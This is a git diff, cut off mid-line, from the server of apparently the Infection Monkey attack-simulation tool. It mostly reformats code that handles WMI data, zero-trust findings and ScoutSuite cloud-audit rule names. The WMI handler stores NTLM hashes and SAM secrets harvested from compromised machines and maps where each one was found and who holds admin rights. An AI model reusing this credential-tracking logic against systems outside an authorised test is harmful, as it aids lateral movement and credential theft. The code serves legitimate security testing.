a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py index 284ae95df..fe401ce38 100644 --- a/monkey/monkey_island/cc/services/wmi_handler.py +++ b/monkey/monkey_island/cc/services/wmi_handler.py @@ -1,11 +1,11 @@ from monkey_island.cc.database import mongo from monkey_island.cc.services.groups_and_users_consts import GROUPTYPE, USERTYPE -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class WMIHandler(object): - ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544' + ADMINISTRATORS_GROUP_KNOWN_SID = "1-5-32-544" def __init__(self, monkey_id, wmi_info, user_secrets): @@ -19,11 +19,11 @@ class WMIHandler(object): self.services = "" self.products = "" else: - self.users_info = wmi_info['Win32_UserAccount'] - self.groups_info = wmi_info['Win32_Group'] - self.groups_and_users = wmi_info['Win32_GroupUser'] - self.services = wmi_info['Win32_Service'] - self.products = wmi_info['Win32_Product'] + self.users_info = wmi_info["Win32_UserAccount"] + self.groups_info = wmi_info["Win32_Group"] + self.groups_and_users = wmi_info["Win32_GroupUser"] + self.services = wmi_info["Win32_Service"] + self.products = wmi_info["Win32_Product"] def process_and_handle_wmi_info(self): @@ -37,62 +37,66 @@ class WMIHandler(object): self.update_critical_services() def update_critical_services(self): - critical_names = ("W3svc", "MSExchangeServiceHost", "dns", 'MSSQL$SQLEXPRES') - mongo.db.monkey.update({'_id': self.monkey_id}, {'$set': {'critical_services': []}}) + critical_names = ("W3svc", "MSExchangeServiceHost", "dns", "MSSQL$SQLEXPRES") + mongo.db.monkey.update({"_id": self.monkey_id}, {"$set": {"critical_services": []}}) - services_names_list = [str(i['Name'])[2:-1] for i in self.services] - products_names_list = [str(i['Name'])[2:-2] for i in self.products] + services_names_list = [str(i["Name"])[2:-1] for i in self.services] + products_names_list = [str(i["Name"])[2:-2] for i in self.products] for name in critical_names: if name in services_names_list or name in products_names_list: - mongo.db.monkey.update({'_id': self.monkey_id}, {'$addToSet': {'critical_services': name}}) + mongo.db.monkey.update( + {"_id": self.monkey_id}, {"$addToSet": {"critical_services": name}} + ) def build_entity_document(self, entity_info, monkey_id=None): general_properties_dict = { - 'SID': str(entity_info['SID'])[4:-1], - 'name': str(entity_info['Name'])[2:-1], - 'machine_id': monkey_id, - 'member_of': [], - 'admin_on_machines': [] + "SID": str(entity_info["SID"])[4:-1], + "name": str(entity_info["Name"])[2:-1], + "machine_id": monkey_id, + "member_of": [], + "admin_on_machines": [], } if monkey_id: - general_properties_dict['domain_name'] = None + general_properties_dict["domain_name"] = None else: - general_properties_dict['domain_name'] = str(entity_info['Domain'])[2:-1] + general_properties_dict["domain_name"] = str(entity_info["Domain"])[2:-1] return general_properties_dict def add_users_to_collection(self): for user in self.users_info: - if not user.get('LocalAccount'): + if not user.get("LocalAccount"): base_entity = self.build_entity_document(user) else: base_entity = self.build_entity_document(user, self.monkey_id) - base_entity['NTLM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('ntlm_hash') - base_entity['SAM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('sam') - base_entity['secret_location'] = [] + base_entity["NTLM_secret"] = self.users_secrets.get(base_entity["name"], {}).get( + "ntlm_hash" + ) + base_entity["SAM_secret"] = self.users_secrets.get(base_entity["name"], {}).get("sam") + base_entity["secret_location"] = [] - base_entity['type'] = USERTYPE - self.info_for_mongo[base_entity.get('SID')] = base_entity + base_entity["type"] = USERTYPE + self.info_for_mongo[base_entity.get("SID")] = base_entity def add_groups_to_collection(self): for group in self.groups_info: - if not group.get('LocalAccount'): + if not group.get("LocalAccount"): base_entity = self.build_entity_document(group) else: base_entity = self.build_entity_document(group, self.monkey_id) - base_entity['entities_list'] = [] - base_entity['type'] = GROUPTYPE - self.info_for_mongo[base_entity.get('SID')] = base_entity + base_entity["entities_list"] = [] + base_entity["type"] = GROUPTYPE + self.info_for_mongo[base_entity.get("SID")] = base_entity def create_group_user_connection(self): for group_user_couple in self.groups_and_users: - group_part = group_user_couple['GroupComponent'] - child_part = group_user_couple['PartComponent'] - group_sid = str(group_part['SID'])[4:-1] - groups_entities_list = self.info_for_mongo[group_sid]['entities_list'] - child_sid = '' + group_part = group_user_couple["GroupComponent"] + child_part = group_user_couple["PartComponent"] + group_sid = str(group_part["SID"])[4:-1] + groups_entities_list = self.info_for_mongo[group_sid]["entities_list"] + child_sid = "" if isinstance(child_part, str): child_part = str(child_part) @@ -100,62 +104,79 @@ class WMIHandler(object): domain_name = None if "cimv2:Win32_UserAccount" in child_part: # domain user - domain_name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split('",Name="')[0] - name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split('",Name="')[1][:-2] + domain_name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split( + '",Name="' + )[0] + name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split( + '",Name="' + )[1][:-2] if "cimv2:Win32_Group" in child_part: # domain group - domain_name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[0] - name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[1][:-2] + domain_name = child_part.split('cimv2:Win32_Group.Domain="')[1].split( + '",Name="' + )[0] + name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[1][ + :-2 + ] for entity in self.info_for_mongo: - if self.info_for_mongo[entity]['name'] == name and \ - self.info_for_mongo[entity]['domain'] == domain_name: - child_sid = self.info_for_mongo[entity]['SID'] + if ( + self.info_for_mongo[entity]["name"] == name + and self.info_for_mongo[entity]["domain"] == domain_name + ): + child_sid = self.info_for_mongo[entity]["SID"] else: - child_sid = str(child_part['SID'])[4:-1] + child_sid = str(child_part["SID"])[4:-1] if child_sid and child_sid not in groups_entities_list: groups_entities_list.append(child_sid) if child_sid: if child_sid in self.info_for_mongo: - self.info_for_mongo[child_sid]['member_of'].append(group_sid) + self.info_for_mongo[child_sid]["member_of"].append(group_sid) def insert_info_to_mongo(self): for entity in list(self.info_for_mongo.values()): - if entity['machine_id']: + if entity["machine_id"]: # Handling for local entities. - mongo.db.groupsandusers.update({'SID': entity['SID'], - 'machine_id': entity['machine_id']}, entity, upsert=True) + mongo.db.groupsandusers.update( + {"SID": entity["SID"], "machine_id": entity["machine_id"]}, entity, upsert=True + ) else: # Handlings for domain entities. - if not mongo.db.groupsandusers.find_one({'SID': entity['SID']}): + if not mongo.db.groupsandusers.find_one({"SID": entity["SID"]}): mongo.db.groupsandusers.insert_one(entity) else: # if entity is domain entity, add the monkey id of current machine to secrets_location. # (found on this machine) - if entity.get('NTLM_secret'): - mongo.db.groupsandusers.update_one({'SID': entity['SID'], 'type': USERTYPE}, - {'$addToSet': {'secret_location': self.monkey_id}}) + if entity.get("NTLM_secret"): + mongo.db.groupsandusers.update_one( + {"SID": entity["SID"], "type": USERTYPE}, + {"$addToSet": {"secret_location": self.monkey_id}}, + ) def update_admins_retrospective(self): for profile in self.info_for_mongo: - groups_from_mongo = mongo.db.groupsandusers.find({ - 'SID': {'$in': self.info_for_mongo[profile]['member_of']}}, - {'admin_on_machines': 1}) + groups_from_mongo = mongo.db.groupsandusers.find( + {"SID": {"$in": self.info_for_mongo[profile]["member_of"]}}, + {"admin_on_machines": 1}, + ) for group in groups_from_mongo: - if group['admin_on_machines']: - mongo.db.groupsandusers.update_one({'SID': self.info_for_mongo[profile]['SID']}, - {'$addToSet': {'admin_on_machines': { - '$each': group['admin_on_machines']}}}) + if group["admin_on_machines"]: + mongo.db.groupsandusers.update_one( + {"SID": self.info_for_mongo[profile]["SID"]}, + {"$addToSet": {"admin_on_machines": {"$each": group["admin_on_machines"]}}}, + ) def add_admin(self, group, machine_id): - for sid in group['entities_list']: - mongo.db.groupsandusers.update_one({'SID': sid}, - {'$addToSet': {'admin_on_machines': machine_id}}) - entity_details = mongo.db.groupsandusers.find_one({'SID': sid}, - {'type': USERTYPE, 'entities_list': 1}) - if entity_details.get('type') == GROUPTYPE: + for sid in group["entities_list"]: + mongo.db.groupsandusers.update_one( + {"SID": sid}, {"$addToSet": {"admin_on_machines": machine_id}} + ) + entity_details = mongo.db.groupsandusers.find_one( + {"SID": sid}, {"type": USERTYPE, "entities_list": 1} + ) + if entity_details.get("type") == GROUPTYPE: self.add_admin(entity_details, machine_id) diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py index 167934d29..7870b97bd 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py @@ -12,26 +12,34 @@ MAX_EVENT_FETCH_CNT = 100 class MonkeyZTDetailsService: - @staticmethod def fetch_details_for_display(finding_id: ObjectId) -> dict: - pipeline = [{'$match': {'_id': finding_id}}, - {'$addFields': {'oldest_events': {'$slice': ['$events', int(MAX_EVENT_FETCH_CNT / 2)]}, - 'latest_events': {'$slice': ['$events', int(-1 * MAX_EVENT_FETCH_CNT / 2)]}, - 'event_count': {'$size': '$events'}}}, - {'$unset': ['events']}] + pipeline = [ + {"$match": {"_id": finding_id}}, + { + "$addFields": { + "oldest_events": {"$slice": ["$events", int(MAX_EVENT_FETCH_CNT / 2)]}, + "latest_events": {"$slice": ["$events", int(-1 * MAX_EVENT_FETCH_CNT / 2)]}, + "event_count": {"$size": "$events"}, + } + }, + {"$unset": ["events"]}, + ] detail_list = list(MonkeyFindingDetails.objects.aggregate(*pipeline)) if detail_list: details = detail_list[0] - details['latest_events'] = MonkeyZTDetailsService._remove_redundant_events(details['event_count'], - details['latest_events']) + details["latest_events"] = MonkeyZTDetailsService._remove_redundant_events( + details["event_count"], details["latest_events"] + ) return details else: raise FindingWithoutDetailsError(f"Finding {finding_id} had no details.") @staticmethod - def _remove_redundant_events(fetched_event_count: int, latest_events: List[object]) -> List[object]: - overlap_count = fetched_event_count - int(MAX_EVENT_FETCH_CNT/2) + def _remove_redundant_events( + fetched_event_count: int, latest_events: List[object] + ) -> List[object]: + overlap_count = fetched_event_count - int(MAX_EVENT_FETCH_CNT / 2) # None of 'latest_events' are in 'oldest_events' if overlap_count >= MAX_EVENT_FETCH_CNT: return latest_events @@ -41,4 +49,4 @@ class MonkeyZTDetailsService: # Some of 'latest_events' are already in 'oldest_events'. # Return only those that are not else: - return latest_events[-1 * overlap_count:] + return latest_events[-1 * overlap_count :] diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py index d8e439c71..68f09fbe9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py @@ -9,7 +9,6 @@ from monkey_island.cc.models.zero_trust.monkey_finding_details import MonkeyFind class MonkeyZTFindingService: - @staticmethod def create_or_add_to_existing(test: str, status: str, events: List[Event]): """ @@ -20,7 +19,9 @@ class MonkeyZTFindingService: when this function should be used. """ existing_findings = list(MonkeyFinding.objects(test=test, status=status)) - assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status) + assert len(existing_findings) < 2, "More than one finding exists for {}:{}".format( + test, status + ) if len(existing_findings) == 0: MonkeyZTFindingService.create_new_finding(test, status, events) @@ -42,13 +43,18 @@ class MonkeyZTFindingService: @staticmethod def get_events_by_finding(finding_id: str) -> List[object]: finding = MonkeyFinding.objects.get(id=finding_id) - pipeline = [{'$match': {'_id': ObjectId(finding.details.id)}}, - {'$unwind': '$events'}, - {'$project': {'events': '$events'}}, - {'$replaceRoot': {'newRoot': '$events'}}] + pipeline = [ + {"$match": {"_id": ObjectId(finding.details.id)}}, + {"$unwind": "$events"}, + {"$project": {"events": "$events"}}, + {"$replaceRoot": {"newRoot": "$events"}}, + ] return list(MonkeyFindingDetails.objects.aggregate(*pipeline)) @staticmethod def add_malicious_activity_to_timeline(events): - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=zero_trust_consts.STATUS_VERIFY, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, + events=events, + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py index a53ef70c8..191685779 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py @@ -1,25 +1,27 @@ from monkey_island.cc.services.zero_trust.monkey_findings import monkey_zt_details_service -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import ( + MonkeyZTDetailsService, +) def test__remove_redundant_events(monkeypatch): - monkeypatch.setattr(monkey_zt_details_service, 'MAX_EVENT_FETCH_CNT', 6) + monkeypatch.setattr(monkey_zt_details_service, "MAX_EVENT_FETCH_CNT", 6) # No events are redundant, 8 events in the database, but we display only 6 (3 latest and 3 oldest) - latest_events = ['6', '7', '8'] - _do_redundant_event_removal_test(latest_events, 8, ['6', '7', '8']) + latest_events = ["6", "7", "8"] + _do_redundant_event_removal_test(latest_events, 8, ["6", "7", "8"]) # All latest events are redundant (only 3 events in db and we fetched them twice) - latest_events = ['1', '2', '3'] + latest_events = ["1", "2", "3"] _do_redundant_event_removal_test(latest_events, 3, []) # Some latest events are redundant (5 events in db and we fetched 3 oldest and 3 latest) - latest_events = ['3', '4', '5'] - _do_redundant_event_removal_test(latest_events, 5, ['4', '5']) + latest_events = ["3", "4", "5"] + _do_redundant_event_removal_test(latest_events, 5, ["4", "5"]) # None of the events are redundant (6 events in db and we fetched 3 oldest and 3 latest) - latest_events = ['4', '5', '6'] - _do_redundant_event_removal_test(latest_events, 6, ['4', '5', '6']) + latest_events = ["4", "5", "6"] + _do_redundant_event_removal_test(latest_events, 6, ["4", "5", "6"]) # No events fetched, should return empty array also latest_events = [] diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py index 80df71786..b92a52ae1 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py @@ -6,43 +6,46 @@ from common.common_consts import zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) from monkey_island.cc.test_common.fixtures import FixtureEnum EVENTS = [ Event.create_event( - title='Process list', - message='Monkey on gc-pc-244 scanned the process list', - event_type='monkey_local', - timestamp=datetime.strptime('2021-01-19 12:07:17.802138', '%Y-%m-%d %H:%M:%S.%f') + title="Process list", + message="Monkey on gc-pc-244 scanned the process list", + event_type="monkey_local", + timestamp=datetime.strptime("2021-01-19 12:07:17.802138", "%Y-%m-%d %H:%M:%S.%f"), ), Event.create_event( - title='Communicate as new user', - message='Monkey on gc-pc-244 couldn\'t communicate as new user. ' - 'Details: System error 5 has occurred. Access is denied.', - event_type='monkey_network', - timestamp=datetime.strptime('2021-01-19 12:22:42.246020', '%Y-%m-%d %H:%M:%S.%f') - ) + title="Communicate as new user", + message="Monkey on gc-pc-244 couldn't communicate as new user. " + "Details: System error 5 has occurred. Access is denied.", + event_type="monkey_network", + timestamp=datetime.strptime("2021-01-19 12:22:42.246020", "%Y-%m-%d %H:%M:%S.%f"), + ), ] TESTS = [ zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER + zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, ] STATUS = [ zero_trust_consts.STATUS_PASSED, zero_trust_consts.STATUS_FAILED, - zero_trust_consts.STATUS_VERIFY + zero_trust_consts.STATUS_VERIFY, ] class TestMonkeyZTFindingService: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_create_or_add_to_existing_creation(self): # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[0]] + ) # Assert that it was properly created findings = list(Finding.objects()) assert len(findings) == 1 @@ -55,17 +58,23 @@ class TestMonkeyZTFindingService: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_create_or_add_to_existing_addition(self): # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[0]] + ) # Assert that there's only one finding assert len(Finding.objects()) == 1 # Add events to an existing finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[1]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[1]] + ) # Assert there's still only one finding, only events got appended assert len(Finding.objects()) == 1 assert len(Finding.objects()[0].details.fetch().events) == 2 # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[1], status=STATUS[1], events=[EVENTS[1]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[1], status=STATUS[1], events=[EVENTS[1]] + ) # Assert there was a new finding created, because test and status is different assert len(MonkeyFinding.objects()) == 2 diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py index 732852174..08d6600a9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py @@ -1,4 +1,4 @@ -RULE_LEVEL_DANGER = 'danger' -RULE_LEVEL_WARNING = 'warning' +RULE_LEVEL_DANGER = "danger" +RULE_LEVEL_WARNING = "warning" RULE_LEVELS = (RULE_LEVEL_DANGER, RULE_LEVEL_WARNING) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py index f8c87083e..c08c7b614 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py @@ -1,7 +1,9 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudformationRules(RuleNameEnum): # Service Security - CLOUDFORMATION_STACK_WITH_ROLE = 'cloudformation-stack-with-role' + CLOUDFORMATION_STACK_WITH_ROLE = "cloudformation-stack-with-role" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py index 886999341..04d1599dd 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py @@ -1,11 +1,13 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudTrailRules(RuleNameEnum): # Logging - CLOUDTRAIL_DUPLICATED_GLOBAL_SERVICES_LOGGING = 'cloudtrail-duplicated-global-services-logging' - CLOUDTRAIL_NO_DATA_LOGGING = 'cloudtrail-no-data-logging' - CLOUDTRAIL_NO_GLOBAL_SERVICES_LOGGING = 'cloudtrail-no-global-services-logging' - CLOUDTRAIL_NO_LOG_FILE_VALIDATION = 'cloudtrail-no-log-file-validation' - CLOUDTRAIL_NO_LOGGING = 'cloudtrail-no-logging' - CLOUDTRAIL_NOT_CONFIGURED = 'cloudtrail-not-configured' + CLOUDTRAIL_DUPLICATED_GLOBAL_SERVICES_LOGGING = "cloudtrail-duplicated-global-services-logging" + CLOUDTRAIL_NO_DATA_LOGGING = "cloudtrail-no-data-logging" + CLOUDTRAIL_NO_GLOBAL_SERVICES_LOGGING = "cloudtrail-no-global-services-logging" + CLOUDTRAIL_NO_LOG_FILE_VALIDATION = "cloudtrail-no-log-file-validation" + CLOUDTRAIL_NO_LOGGING = "cloudtrail-no-logging" + CLOUDTRAIL_NOT_CONFIGURED = "cloudtrail-not-configured" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py index d22baafc7..954e6fc11 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py @@ -1,6 +1,8 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudWatchRules(RuleNameEnum): # Logging - CLOUDWATCH_ALARM_WITHOUT_ACTIONS = 'cloudwatch-alarm-without-actions' + CLOUDWATCH_ALARM_WITHOUT_ACTIONS = "cloudwatch-alarm-without-actions" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py index 5d86b0b3e..6487bda99 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py @@ -1,6 +1,8 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ConfigRules(RuleNameEnum): # Logging - CONFIG_RECORDER_NOT_CONFIGURED = 'config-recorder-not-configured' + CONFIG_RECORDER_NOT_CONFIGURED = "config-recorder-not-configured" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py index dddf18b99..648fbed61 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py @@ -1,35 +1,37 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class EC2Rules(RuleNameEnum): # Permissive firewall rules - SECURITY_GROUP_ALL_PORTS_TO_ALL = 'ec2-security-group-opens-all-ports-to-all' - SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL = 'ec2-security-group-opens-TCP-port-to-all' - SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL = 'ec2-security-group-opens-UDP-port-to-all' - SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL = 'ec2-security-group-opens-RDP-port-to-all' - SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL = 'ec2-security-group-opens-SSH-port-to-all' - SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL = 'ec2-security-group-opens-MySQL-port-to-all' - SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL = 'ec2-security-group-opens-MsSQL-port-to-all' - SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL = 'ec2-security-group-opens-MongoDB-port-to-all' - SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL = 'ec2-security-group-opens-Oracle DB-port-to-all' - SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL = 'ec2-security-group-opens-PostgreSQL-port-to-all' - SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL = 'ec2-security-group-opens-NFS-port-to-all' - SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL = 'ec2-security-group-opens-SMTP-port-to-all' - SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL = 'ec2-security-group-opens-DNS-port-to-all' - SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF = 'ec2-security-group-opens-all-ports-to-self' - SECURITY_GROUP_OPENS_ALL_PORTS = 'ec2-security-group-opens-all-ports' - SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP = 'ec2-security-group-opens-plaintext-port-FTP' - SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET = 'ec2-security-group-opens-plaintext-port-Telnet' - SECURITY_GROUP_OPENS_PORT_RANGE = 'ec2-security-group-opens-port-range' - EC2_SECURITY_GROUP_WHITELISTS_AWS = 'ec2-security-group-whitelists-aws' + SECURITY_GROUP_ALL_PORTS_TO_ALL = "ec2-security-group-opens-all-ports-to-all" + SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL = "ec2-security-group-opens-TCP-port-to-all" + SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL = "ec2-security-group-opens-UDP-port-to-all" + SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL = "ec2-security-group-opens-RDP-port-to-all" + SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL = "ec2-security-group-opens-SSH-port-to-all" + SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL = "ec2-security-group-opens-MySQL-port-to-all" + SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL = "ec2-security-group-opens-MsSQL-port-to-all" + SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL = "ec2-security-group-opens-MongoDB-port-to-all" + SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL = "ec2-security-group-opens-Oracle DB-port-to-all" + SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL = "ec2-security-group-opens-PostgreSQL-port-to-all" + SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL = "ec2-security-group-opens-NFS-port-to-all" + SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL = "ec2-security-group-opens-SMTP-port-to-all" + SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL = "ec2-security-group-opens-DNS-port-to-all" + SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF = "ec2-security-group-opens-all-ports-to-self" + SECURITY_GROUP_OPENS_ALL_PORTS = "ec2-security-group-opens-all-ports" + SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP = "ec2-security-group-opens-plaintext-port-FTP" + SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET = "ec2-security-group-opens-plaintext-port-Telnet" + SECURITY_GROUP_OPENS_PORT_RANGE = "ec2-security-group-opens-port-range" + EC2_SECURITY_GROUP_WHITELISTS_AWS = "ec2-security-group-whitelists-aws" # Encryption - EBS_SNAPSHOT_NOT_ENCRYPTED = 'ec2-ebs-snapshot-not-encrypted' - EBS_VOLUME_NOT_ENCRYPTED = 'ec2-ebs-volume-not-encrypted' - EC2_INSTANCE_WITH_USER_DATA_SECRETS = 'ec2-instance-with-user-data-secrets' + EBS_SNAPSHOT_NOT_ENCRYPTED = "ec2-ebs-snapshot-not-encrypted" + EBS_VOLUME_NOT_ENCRYPTED = "ec2-ebs-volume-not-encrypted" + EC2_INSTANCE_WITH_USER_DATA_SECRETS = "ec2-instance-with-user-data-secrets" # Permissive policies - AMI_PUBLIC = 'ec2-ami-public' - EC2_DEFAULT_SECURITY_GROUP_IN_USE = 'ec2-default-security-group-in-use' - EC2_DEFAULT_SECURITY_GROUP_WITH_RULES = 'ec2-default-security-group-with-rules' - EC2_EBS_SNAPSHOT_PUBLIC = 'ec2-ebs-snapshot-public' + AMI_PUBLIC = "ec2-ami-public" + EC2_DEFAULT_SECURITY_GROUP_IN_USE = "ec2-default-security-group-in-use" + EC2_DEFAULT_SECURITY_GROUP_WITH_RULES = "ec2-default-security-group-with-rules" + EC2_EBS_SNAPSHOT_PUBLIC = "ec2-ebs-snapshot-public" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py index 0d1d4e5d9..c4fad62ec 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py @@ -1,10 +1,12 @@ -from 